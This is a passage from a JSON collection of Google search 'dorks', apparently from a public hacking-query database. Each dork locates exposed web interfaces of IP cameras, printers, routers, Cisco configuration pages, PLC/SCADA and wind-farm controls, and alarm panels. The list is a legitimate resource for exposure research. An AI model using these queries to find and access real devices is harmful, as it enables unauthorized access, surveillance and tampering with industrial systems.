Login:\" \"System Manager ID:\"", "description": "# Google Dork: intitle:\"Remote UI: Login:\" \"System Manager ID:\"\r\n\r\n# Various online devices (Canon printer servers).\r\n\r\n# Date: 02/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Nordex Control\" + \"Wind Farm Total Summary\"", "description": "# Google Dork: intitle:\"Nordex Control\" + \"Wind Farm Total Summary\"\r\n\r\n# Various online devices (Nordex wind turbine farms).\r\n\r\n# Date: 02/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Keenetic Web\"", "description": "# Google Dork: intitle:\"Keenetic Web\"\r\n\r\n# Various online devices (Keenetic Smart Home).\r\n\r\n# Date: 03/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/main/main.html \"Administrator Settings\"", "description": "# Google Dork: inurl:/main/main.html \"Administrator Settings\"\r\n\r\n# Various online devices (admin pages of Brother printers).\r\n\r\n# Date: 02/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Advanced Setup - Security - Admin User Name & Password\"", "description": "# Google Dork: intitle:\"Advanced Setup - Security - Admin User Name & Password\"\r\n\r\n# Various online devices (ActionTec modem configuration).\r\n\r\n# Date: 03/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*.*/level/15/exec/-/ \"Exec Configure\"", "description": "# Google Dork: site:*.*/level/15/exec/-/ \"Exec Configure\"\r\n\r\n# Various online devices (Cisco).\r\n\r\n# Date: 03/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"ePMP 2000\" \"notifications\" \"Menu\" -pdf", "description": "# Google Dork: intitle:\"ePMP 2000\" \"notifications\" \"Menu\" -pdf\r\n\r\n# Various online devices.\r\n\r\n# Date: 12/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"ContaCam\" \"Snapshot Image\"", "description": "# Google Dork: intitle:\"ContaCam\" \"Snapshot Image\"\r\n\r\n# Various online devices.\r\n\r\n# Date: 15/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/tcpipv4.htm", "description": "# Google Dork: site:*/tcpipv4.htm\r\n\r\n# Various online devices.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"HD IP Camera\" \"Remember me\" \"User name\" -.com -pdf", "description": "# Google Dork: intitle:\"HD IP Camera\" \"Remember me\" \"User name\" -.com -pdf\r\n\r\n# Various online devices.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:set_config_security.htm", "description": "# Google Dork: inurl:set_config_security.htm\r\n\r\n# Various online devices.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"webcamxp 5\" intext: \"live stream\"", "description": "# Dork: *intitle:\"webcamxp 5\" intext: \"live stream\"*"}, {"dork": "inurl:\"userimage.html\" \"Live\" \"Open\"", "description": "# Google Dork: inurl:\"userimage.html\" \"Live\" \"Open\"\r\n# Various online devices.\r\n# Date: 17/03/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/view/viewer_index.shtml", "description": "# Title: IP Cameras\r\n\r\n# Google Dork: inurl:/view/viewer_index.shtml\r\n\r\n# Date: 19/03/2021\r\n\r\n# Author: Tobias Marcotto\r\n\r\n# Description: Find IP Cameras"}, {"dork": "inurl:set_config_networkIP.html", "description": "# Google Dork: inurl:set_config_networkIP.html\r\n\r\n# Various online devices.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/tcpipv6.htm", "description": "# Google Dork: site:*/tcpipv6.htm\r\n\r\n# Various online devices.\r\n\r\n# Date: 23/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/guestimage.html", "description": "# Title: IP Cameras\r\n\r\n# Google Dork: inurl:/guestimage.html\r\n\r\n# Date: 29/03/2021\r\n\r\n# Author: Tobias Marcotto\r\n\r\n# Description: Find IP Cameras"}, {"dork": "inurl:plc/webvisu.htm intitle:\"CoDeSys WebVisualization\"", "description": "# Google Dork: inurl:plc/webvisu.htm intitle:\"CoDeSys WebVisualization\"\r\n\r\n# Various online devices (PLC/SCADA web visual interface)\r\n\r\n# Date: 25/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"openHAB\" intext:\"Welcome to openHAB\" \"Basic UI\" \"Paper UI\"", "description": "# Google Dork: intitle:\"openHAB\" intext:\"Welcome to openHAB\" \"Basic UI\" \"Paper UI\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 25/03/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode\r\n\r\n\r\n\r\n--\r\n\r\nThanks & Regards,\r\n\r\nMugdha Peter Bansode"}, {"dork": "intext:\"Inserire il proprio codice per accedere al sistema\" \"Inserire codice\"", "description": "# Google Dork: intext:\"Inserire il proprio codice per accedere al sistema\" \"Inserire codice\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 31/03/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode\r\n\r\n\r\n-- \r\nThanks & Regards,\r\nMugdha Peter Bansode"}, {"dork": "inurl:m_login.htm \"Somfy\"", "description": "# Google Dork: inurl:m_login.htm \"Somfy\"\r\n\r\n# Various online devices (Smart Home Devices).\r\n\r\n# Date: 02/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/intouch-base/rest/nlogin\" intitle:\"InTouch\"", "description": "# Google Dork: inurl:\"/intouch-base/rest/nlogin\" intitle:\"InTouch\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 07/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/index.html\" intitle:\"Unitronics PLC\"", "description": "# Google Dork: inurl:\"/index.html\" intitle:\"Unitronics PLC\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 07/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Vodafone Vox UI\" | intitle:\"Residential Gateway Login\"", "description": "# Google Dork: intitle:intitle:\"Vodafone Vox UI\" | intitle:\"Residential Gateway Login\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Properties - Xerox WorkCentre\" \"Machine Model:\" \"Machine Name\" -.com", "description": "# Google Dork: intitle:\"Properties - Xerox WorkCentre\" \"Machine Model:\" \"Machine Name\" -.com\r\n# Various online devices (Xerox printers).\r\n# Date: 13/04/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Polycom Login\" -.com", "description": "# Google Dork: intitle:\"Polycom Login\" -.com\r\n\r\n# Various online devices (Polycom Video Conferencing).\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Saia PCD Web-Server\"", "description": "# Google Dork: intitle:\"Saia PCD Web-Server\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 07/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"NETSuveillance WEB\"", "description": "# Google Dork: intitle:\"NETSuveillance WEB\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:pas_set_menu.html", "description": "# Google Dork: inurl:pas_set_menu.html\r\n\r\n# Various online devices (Canon printers).\r\n\r\n# Date: 13/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Sys Name\" System Summary Sensors", "description": "# Google Dork: intitle:\"Sys Name\" System Summary Sensors\r\n\r\n# Various online devices.\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Epson Web Control\" \"OSD Control Pad\"", "description": "# Google Dork: intitle:\"Epson Web Control\" \"OSD Control Pad\"\r\n\r\n# Various online devices (Epson printers).\r\n\r\n# Date: 13/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/net/net/protocol.html", "description": "# Google Dork: site:*/net/net/protocol.html\r\n\r\n# Various online devices (printers).\r\n\r\n# Date: 16/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"HD-Network Real Time Monitoring System\" inurl:\"/login.asp\"", "description": "# Google Dork:intitle:\"HD-Network Real Time Monitoring System\" inurl:\"/login.asp\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 19/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Milesight Network Camera\" intext:\"Language\"", "description": "# DorK: intitle:\"Milesight Network Camera\" intext:\"Language\""}, {"dork": "inurl:ip_snmp.htm", "description": "# Dork: inurl:ip_snmp.htm\r\n\r\nBy using this dork, ip snmp configuration page can be found.\r\n\r\nThank you!\r\nPrakash"}, {"dork": "intitle:\"Bosch Security Systems\" \"LIVEPAGE\" + \"SETTINGS\" -.net -.com", "description": "# Google Dork: intitle:\"Bosch Security Systems\" \"LIVEPAGE\" + \"SETTINGS\" -.net -.com\r\n\r\n# Various Online Devices.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"DD-WRT (build 21061) - Info\"", "description": "# Google Dork: intitle:\"DD-WRT (build 21061) - Info\"\r\n\r\n# Various Online Devices.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:ip_password.htm", "description": "# Dork: inurl:ip_password.htm"}, {"dork": "intitle:\"DSM mobile\" intext:\"Loading...\"", "description": "# Google Dork:intitle:\"DSM mobile\" intext:\"Loading...\"\r\n\r\n# Various Online Devices.\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Web Client\" inurl:\"webcamera.html\"", "description": "# Google Dork: intitle:\"Web Client\" inurl:\"webcamera.html\"\r\n\r\n# Various Online Devices.\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:/DeviceInformation/View \"Device Name\"", "description": "# Google Dork: inurl:/DeviceInformation/View \"Device Name\"\r\n\r\n# Various Online Devices.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"NodeCore PoW Mining Pool\" \"NETWORK\" \"TYPE\" \"POOL ADDRESS\" \"FEE\"", "description": "# Google Dork: intitle:\"NodeCore PoW Mining Pool\" \"NETWORK\" \"TYPE\" \"POOL ADDRESS\" \"FEE\"\r\n# Various Online Devices\r\n# Date: 27/04/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Login\" inurl:\"/simple/view/login.html\"", "description": "# Google Dork: intitle:\"Login\" inurl:\"/simple/view/login.html\"\r\n\r\n# Various Online Devices.\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"LK IHC controller\" intext:\"LK IHC\"", "description": "# Google Dork: intitle:\"LK IHC controller\" intext:\"LK IHC\"\r\n# Various Online Devices\r\n# Date: 03/05/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Openstage IP Phone User\" \"IPv4\" \"DNS\"", "description": "# Google Dork: intitle:\"Openstage IP Phone User\" \"IPv4\" \"DNS\"\r\n# Siemens Openstage brand IP phones.\r\n# Date: 29/04/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"USB Port 1 (Public Data)\" + \"USB Port 2 (Public Data)\" \"Status\" -pdf", "description": "# Google Dork: \"USB Port 1 (Public Data)\" + \"USB Port 2 (Public Data)\" \"Status\" -pdf\r\n\r\n# Various Online Devices.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/PRESENTATION/HTML/TOP/PRTINFO.HTML", "description": "# Exploit Title: Discover Publicly Available Epson Devices (printer,scanner etc.)\r\n# Google Dork: inurl:/PRESENTATION/HTML/TOP/PRTINFO.HTML\r\n# Date: 2021-05-06\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:/PRESENTATION/EPSONCONNECT", "description": "# Dork: Discover Publicly Available Epson Devices (printer,scanner etc.)\r\n# Google Dork: inurl:/PRESENTATION/EPSONCONNECT\r\n# Date: 2021-05-07\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intext:@print.epsonconnect.com intitle:series", "description": "# Google Dork: intext:@print.epsonconnect.com intitle:series\r\n# Date: 2021-05-07\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "Google Dork: intitle:\"ZM - Console\"", "description": "# Google Dork: intitle:\"ZM - Console\"\r\n# Description: Find ZoneMinder (video surveillance software) list of conencted devices.\r\n# Date: 08/05/2021.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing Console log."}, {"dork": "Google Dork: intitle:\"ZM - System Log\"", "description": "# Exploit Title: ZoneMinder Unprotected System Log.\r\n# Google Dork: intitle:\"ZM - System Log\"\r\n# Description: Find ZoneMinder (video surveillance software) System Logs.\r\n# Date: 08/05/2021.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing System Logs."}, {"dork": "inurl:/login/?referer=/admin/ intext:cradlepoint", "description": "# Dork: inurl:/login/?referer=/admin/ intext:cradlepoint\r\n# (Cradlepoint Router) Various Online Devices\r\n# Exploit Author: Shivani Arya"}, {"dork": "allintext:\"Copyright CANON INC\" \"iR-ADV\"", "description": "# Dork: allintext:\"Copyright CANON INC\" \"iR-ADV\"\r\n# (Canon Printer) VArious Online Devices\r\n# Exploit Author: Shivani Arya"}, {"dork": "inurl:\"/cgi-bin/luci\" intext:\"Authorization Required\" intitle:\"LuCI\"", "description": "# Google Dork: inurl:\"/cgi-bin/luci\" intext:\"Authorization Required\" intitle:\"LuCI\"\r\n# (OpenWrt Router) Various Online Devices\r\n# Exploit Author: Shivani Arya"}, {"dork": "\"Name\" \"Password\" intitle:\"LANCOM 1790VA\"", "description": "# Dork: \"Name\" \"Password\" intitle:\"LANCOM 1790VA\""}, {"dork": "intitle:series \"Note: It is recommended to communicate via HTTPS for entering an administrator password.\"", "description": "# Exploit Title: Discover Publicly Available Devices (printer, scanner etc.)\r\n# Google Dork: intitle:series \"Note: It is recommended to communicate via HTTPS for entering an administrator password.\"\r\n# Date: 2021-05-14\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:/PRESENTATION/PSWD", "description": "# Exploit Title: Discover Publicly Available Epson Devices (printer, scanner etc.)\r\n# Google Dork: inurl:/PRESENTATION/PSWD\r\n# Date: 2021-05-14\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:/PRESENTATION/BONJOUR intitle:Series", "description": "# Exploit Title: Discover Publicly Available Epson Devices (printer, scanner etc.)\r\n# Google Dork: inurl:/PRESENTATION/BONJOUR intitle:Series\r\n# Date: 2021-05-14\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"Yealink\" inurl:\"servlet?m=\"", "description": "# Dork: intitle:\"Yealink\" inurl:\"servlet?m=\""}, {"dork": "intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm", "description": "# Exploit Title: Discover Publicly Available Devices\r\n# Google Dork: intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm\r\n# Date: 2021-05-14\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"Device(\" intext:\"ActiveX Mode (For IE Browser)\"", "description": "# Dork: intitle:\"Device(\" intext:\"ActiveX Mode (For IE Browser)\""}, {"dork": "intext:\"LANCOM 1781VA (over ISDN)\"", "description": "# Dork: intext:\"LANCOM 1781VA (over ISDN)\""}, {"dork": "intitle:\"Web Client for DVR\"", "description": "# Dork: intitle:\"Web Client for DVR\""}, {"dork": "intitle:\"Intelbras\" site:*/index.html", "description": "# Dork: intitle:\"Intelbras\" site:*/index.html"}, {"dork": "inurl:/portal/indicate intitle:Remote UI", "description": "# Exploit Title: Discover Publicly Available Devices\r\n# Google Dork: inurl:/portal/indicate intitle:Remote UI\r\n# Date: 2021-05-14\r\n# Exploit Author: Saptarshi Chatterjee"}, {"dork": "inurl:mobile.html intitle:webcamXP", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: inurl:mobile.html intitle:webcamXP\r\n# Date: 2021-05-21\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"supra IPC\"", "description": "# Dork: intitle:\"supra IPC\""}, {"dork": "intitle:\"Dell OpenManage Switch Administrator\" intext:\"Type in Username and Password, then click OK\"", "description": "# Dork: intitle:\"Dell OpenManage Switch Administrator\" intext:\"Type in Username and Password, then click OK\""}, {"dork": "intitle:\"Alarm Panel\" intext:\"Climax Tech. Co., Ltd.\"", "description": "# Dork: intitle:\"Alarm Panel\" intext:\"Climax Tech. Co., Ltd.\""}, {"dork": "intitle:\"webcamxp\" \"Flash JPEG Stream\"", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:\"webcamxp\" \"Flash JPEG Stream\"\r\n# Date: 2021-05-21\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "\"Username\" \"Password\" \"ZTE Corporation. All rights reserved.\"", "description": "# Dork: \"Username\" \"Password\" \"ZTE Corporation. All rights reserved.\""}, {"dork": "intitle:\"WF Series\" inurl:PRTINFO.html", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:\"WF Series\" inurl:PRTINFO.html\r\n# Date: 2021-05-25\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "\"NETGEAR, Inc. All rights reserved\" intitle:\"Netgear Prosafe Plus Switch\"", "description": "# Dork: \"NETGEAR, Inc. All rights reserved\" intitle:\"Netgear Prosafe Plus Switch\""}, {"dork": "intitle:\"Remote UI\" intext:\"Printer status\"", "description": "# Google Dork: intitle:\"Remote UI\" intext:\"Printer status\"\r\n# Various Online Devices\r\n# Date: 31/05/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"::: ACEmanager :::\"", "description": "# Dork: intitle:\"::: ACEmanager :::\""}, {"dork": "intitle:\"Camera Status\" inurl:/control/", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:\"Camera Status\" inurl:/control/\r\n# Date: 2021-05-21\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"Solar-Log\u2122\" intext:\"Build Revision\"", "description": "# Google Dork: intitle:\"Solar-Log\u2122\" intext:\"Build Revision\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"3CX Phone System Management Console\"", "description": "# Google Dork: intitle:\"3CX Phone System Management Console\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"/web/guest/en/websys/webArch/mainFrame.cgi\"", "description": "# Google Dork: inurl:\"/web/guest/en/websys/webArch/mainFrame.cgi\"\r\n\r\n# Various Online Devices\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"myhome\" intext:\"Tilgin. All rights reserved. Copyright and Trademark.\"", "description": "# Dork: intitle:\"myhome\" intext:\"Tilgin. All rights reserved. Copyright and Trademark.\""}, {"dork": "intitle:LANCOM \"A webbrowser with active JavaScript support is required.\"", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:LANCOM \"A webbrowser with active JavaScript support is required.\"\r\n# Date: 2021-05-20\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:(\"Canon\" + \"series Network Configuration\" \"Basic Information\") + \"JavaScript is not enabled\"", "description": "# Google Dork: intitle:(\"Canon\" + \"series Network Configuration\" \"Basic Information\") + \"JavaScript is not enabled\"\r\n\r\n# Various online devices (Canon).\r\n\r\n# Date: 26/05/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"serverpush.htm\" \"IP Camera\" intext:\"Foscam\"", "description": "#Google Dork: inurl:\"serverpush.htm\" \"IP Camera\" intext:\"Foscam\"\r\n# Various Online Devices\r\n# Date: 28/06/2021\r\n# Exploit Author: Neha Singh\r\n\r\n\r\nThanks and Regards\r\nNeha Singh"}, {"dork": "intitle:\"CPU-Modul TROVIS 6610\"", "description": "# Google Dork: intitle:\"CPU-Modul TROVIS 6610\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 16/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Cambium\" inurl:top.cgi", "description": "# Google Dork: intitle:\"Cambium\" inurl:top.cgi\r\n\r\n# Category: Various Online Devices\r\n\r\n# Date: 05/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:top.cgi intitle:\"Motorola ptp\"", "description": "# Google Dork: inurl:top.cgi intitle:\"Motorola ptp\"\r\n\r\n# Category: Various Online Devices\r\n\r\n# Date: 05/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"vood Residential gateway\" inurl:vood/cgi-bin/", "description": "# Google Dork: intitle:\"vood Residential gateway\" inurl:vood/cgi-bin/\r\n\r\n# Category: Various Online Devices\r\n\r\n# Date: 09/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"Egardia & WoonVeilig\" -site:\"linkedin.*\" -\"data-lead.com\" -\"getemail.io\" -\"holaconnect.com\" -\"kzhead.info\"", "description": "# Google Dork: intext:\"Egardia & WoonVeilig\" -site:\"linkedin.*\" -\"data-lead.com\" -\"getemail.io\" -\"holaconnect.com\" -\"kzhead.info\"\r\n\r\n# Various online devices\r\n\r\n# Date: 21/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:\"Live View\" inurl:ui3.htm", "description": "# Google Dork: intext:\"Live View\" inurl:ui3.htm\r\n\r\n# Various Online Devices\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"lg smart ip device\" -.com", "description": "# Google Dork: intitle:\"lg smart ip device\" -.com\r\n# Category: Various Online Devices\r\n# Date: 05/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"7100 login\" \"lancom\"", "description": "# Google Dork: intitle:\"7100 login\" \"lancom\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:/multi.html intitle:webcam", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: inurl:/multi.html intitle:webcam\r\n# Date: 2021-06-28\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:/hp/device/SignIn/", "description": "# Google Dork: inurl:/hp/device/SignIn/\r\n# Category: Various Online Devices\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:/view.htm?mode=l", "description": "# Google Dork: inurl:/view.htm?mode=l\r\n# Various online devices\r\n# Date: 17/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"Blue Iris Remote View\"", "description": "# Google Dork: intitle:\"Blue Iris Remote View\"\r\n# Various Online Devices\r\n# Date: 18/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"jpegpush.htm\"", "description": "# Google Dork: inurl:\"jpegpush.htm\"\r\n# Various Online Devices\r\n# Date: 19/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"xerox\" inurl:i_index", "description": "# Google Dork: intitle:\"xerox\" inurl:i_index\r\n# Category: Various Online Devices\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Cisco ASDM\" inurl:\"admin/public/index.html\"", "description": "# Google Dork: intitle:\"Cisco ASDM\" inurl:\"admin/public/index.html\"\r\n# Date: 29/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "\"IPECS\" inurl:a_index.html", "description": "# Google Dork: \"IPECS\" inurl:a_index.html\r\n# Category: Various Online Devices\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Welcome to\" intext:\"configuration interface\"", "description": "# Google Dork: intitle:\"Welcome to\" intext:\"configuration interface\"\r\n# Category: Various Online Devices\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"2009 PLANET Technology Corporation\"", "description": "# Google Dork: intext:\"2009 PLANET Technology Corporation\"\r\n# Category: Various Online Devices\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"PRTG Network Monitor\" inurl:index.htm intext:\"Password\" -inurl:prtg", "description": "# Google Dork: intitle:\"PRTG Network Monitor\" inurl:index.htm intext:\"Password\" -inurl:prtg\r\n# Category: Various Online Devices\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Netgear System Login\" intext:\"system name\"", "description": "# Google Dork: intitle:\"Netgear System Login\" intext:\"system name\"\r\n# Category: Various Online Devices\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Hello! Welcome to Synology Web Station!\"", "description": "# Google Dork: intitle:\"Hello! Welcome to Synology Web Station!\"\r\n# Various Online Devices\r\n# Date: 6/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/nphMotionJpeg?Resolution=", "description": "# Google Dork: inurl:/nphMotionJpeg?Resolution=\r\n# Pages Various Online Devices\r\n# Date: 24/08/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:hp/device/webAccess", "description": "# Google Dork: inurl:hp/device/webAccess\r\n# Various Online Devices\r\n# Date: 8/30/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"setup\" \"Network setup\" \"DHCP Client ID\" -.com", "description": "# Google Dork: intitle:\"setup\" \"Network setup\" \"DHCP Client ID\" -.com\r\n# Various Online Devices\r\n# Date: 31/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Welcome-netis Wireless\"", "description": "# Google Dork:intitle:\"Welcome-netis Wireless\"\r\n# Various Online Devices\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "\"Router Name\" \"Router Model\" \"LAN MAC\" \"WAN MAC\"", "description": "# Google Dork: \"Router Name\" \"Router Model\" \"LAN MAC\" \"WAN MAC\"\r\n# Various Online Devices\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"D-LINK CORPORATION, INC\" intext:\"D-Link Corporation, Inc.\" -dlink.ca", "description": "# Google Dork:intitle:\"D-LINK CORPORATION, INC\" intext:\"D-Link Corporation, Inc.\" -dlink.ca\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Login\" intext:\"PLANET Technology Corporation. All rights reserved.\"", "description": "# Google Dork: intitle:\"Login\" intext:\"PLANET Technology Corporation. All rights reserved.\"\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"JUNG KNX Smart-Panel\" \"JUNG Single Regular\"", "description": "# Google Dork: intitle:\"JUNG KNX Smart-Panel\" \"JUNG Single Regular\"\r\n# Various Online Devices\r\n# Date: 08/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intext:\"This page displays the general system information of the print server.\"", "description": "# Google Dork: intext:\"This page displays the general system information of the print server.\"\r\n# Various Online Devices\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "\"Language\" \"SIM NUM\" \"DEV NUM\" intitle:\"mdvr\"", "description": "# Google Dork: \"Language\" \"SIM NUM\" \"DEV NUM\" intitle:\"mdvr\"\r\n# Various Online Devices\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Device(Foscam)\" \"Real-time IP Camera Monitoring System\"", "description": "# Google Dork: intitle:\"Device(Foscam)\" \"Real-time IP Camera Monitoring System\"\r\n# Various Online Devices\r\n# Date: 12/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"SoundTouch Access Point Setup\"", "description": "# Google Dork: intitle:\"SoundTouch Access Point Setup\"\r\n# Various Online Devices\r\n# Date: 10/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Bose SoundTouch Wi-Fi Music System Setup\" inurl:\"/setup/index.asp\"", "description": "# Google Dork: intitle:\"Bose SoundTouch Wi-Fi Music System Setup\" inurl:\"/setup/index.asp\"\r\n# Various Online Devices\r\n# Date: 10/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"ACEmanager\" \"ALEOS Version\"", "description": "# Google Dork: intitle:\"ACEmanager\" \"ALEOS Version\"\r\n# Various Online Devices\r\n# Date: 13/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "\"Datamanager\" \"Devices\" \"Reports\" \"Alarm\" \"Log\" \"Service\" \"Gp Run-On\"", "description": "# Google Dork: \"Datamanager\" \"Devices\" \"Reports\" \"Alarm\" \"Log\" \"Service\" \"Gp Run-On\"\r\n# Various Online Devices\r\n# Date: 11/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"yawcam\" \"It's a webcam!\" \"user\" \"pass\"", "description": "# Google Dork: intitle:\"yawcam\" \"It's a webcam!\" \"user\" \"pass\"\r\n# Various Online Devices\r\n# Date: 23/07/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"ipMonitor - Log in\"", 